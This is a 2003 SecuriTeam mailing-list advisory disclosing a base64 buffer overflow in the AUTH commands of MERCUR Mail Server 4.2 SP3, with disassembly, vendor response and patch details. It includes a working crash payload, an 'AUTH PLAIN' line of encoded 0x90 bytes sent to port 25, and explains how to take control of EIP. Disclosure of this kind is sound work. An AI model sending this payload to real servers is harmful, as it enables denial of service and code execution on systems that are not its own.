[NT] MERCUR Mail Server AUTH Vulnerability (Base64)

From: SecuriTeam (support_at_securiteam.com)
Date: 10/26/03

  • Next message: SecuriTeam: "[TOOL] Snorter - Snort HTML Reporting Engine" 
    To: list@securiteam.com
Date: 26 Oct 2003 12:26:57 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      MERCUR Mail Server AUTH Vulnerability (Base64)
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.atrium-software.com/> MERCUR Mail Server "offers the
    necessary features to provide an efficient and effective communications
    medium. These include Security features using IP-Caching Firewall, NORMAN
    Virus Control Engine, and check open relay database by using DNS, Remote
    Configuration via a Web Browser, Dial-Up-connectivity (Modem, ISDN-Card),
    dedicated connectivity (ISDN-Router) or connectivity over the network
    (Router) to your ISP".

    A vulnerability in MERCUR's base64 decoding, which is supported by the
    AUTH command, allows remote attackers to trigger a buffer overflow in the
    program.

    DETAILS

    Vulnerable systems:
     * MERCUR Mail Server v4.2 SP3 and below

    Immune systems:
     * MERCUR Mail Server v4.2 SP3a

    The vulnerability is located in the base64 decoding routine that does not
    check the length of the supplied data and hence decodes and writes
    everything it can until nothing is left. However, there are cases when the
    destination buffer is small enough (and on the stack) so that a buffer
    overflow will give us the control of EBP and EIP, and then allow remote
    code execution.

    For the SMTP component, the command I used in the exploit is "AUTH PLAIN
    Base64String". By carefully constructing the buffer to encode ([0x10C
    DATA],[EBP],[EIP]), encoding it and sending it, we trigger the overflow
    and gain control of code execution. Here is the disassembled source of the
    faulty section:
    CODE:00424FB8 push eax ; length of data
    CODE:00424FB9 lea edx, [ebp+var_10C] ; only 0x10C
    bytes above EBP !
    CODE:00424FBF push edx ; destination buffer
    CODE:00424FC0 push edi ; source buffer
    CODE:00424FC1 call base64_decode

    (Up to you to check the base64 decoding routine)

    One can reproduce the fault by connecting to port 25 of the server (with
    the telnet client of Win2k or WinXP - not a UNIX one that will result in a
    connection-closed event) and sending the following query (on a single
    line):

    AUTH PLAIN
    kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
    kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
    kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
    kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
    kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
    kJCQkJCQkJCQkJCQkJCQkJCQkJCQ

    Server will try to execute code at address 0x90909090 and crash.

    Vulnerability is also present in the POP3 module ("AUTH PLAIN" command)
    and the IMAP module ("AUTHENTICATE PLAIN" command).

    Vendor Response:
    Vendor was contacted on October, 7th 2003.

    Stefan Sigmund from atrium software international responded to Kostya's
    initial query:

    "We are able to duplicate the problem with POP3 and IMAP4, but not with
    SMTP. All three services contain a special buffer-checking feature. Very
    long commands will be blocked and the connection will be closed
    immediately. It seems that this feature works well in the SMTP part.

    However, we are going to create a patch for that issue. But, we need to
    make sure that everything is working well."

    Solution:
    Upgrade to MERCUR Mailserver Version 4.2 - Service Pack 3a which is
    available since October, 20th 2003. You might also want to check the
    following URLs:
    <http://www.atrium-software.com/mail%20server/pub/mcr42sp3a.html>
    http://www.atrium-software.com/mail%20server/pub/mcr42sp3a.html or
    <http://www.atrium-software.com/download/mercur%20service%20pack.exe>
    http://www.atrium-software.com/download/mercur%20service%20pack.exe.

    ADDITIONAL INFORMATION

    The information has been provided by
    <mailto:kostya.kortchinsky@renater.fr> Kostya KORTCHINSKY.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[TOOL] Snorter - Snort HTML Reporting Engine"

    Relevant Pages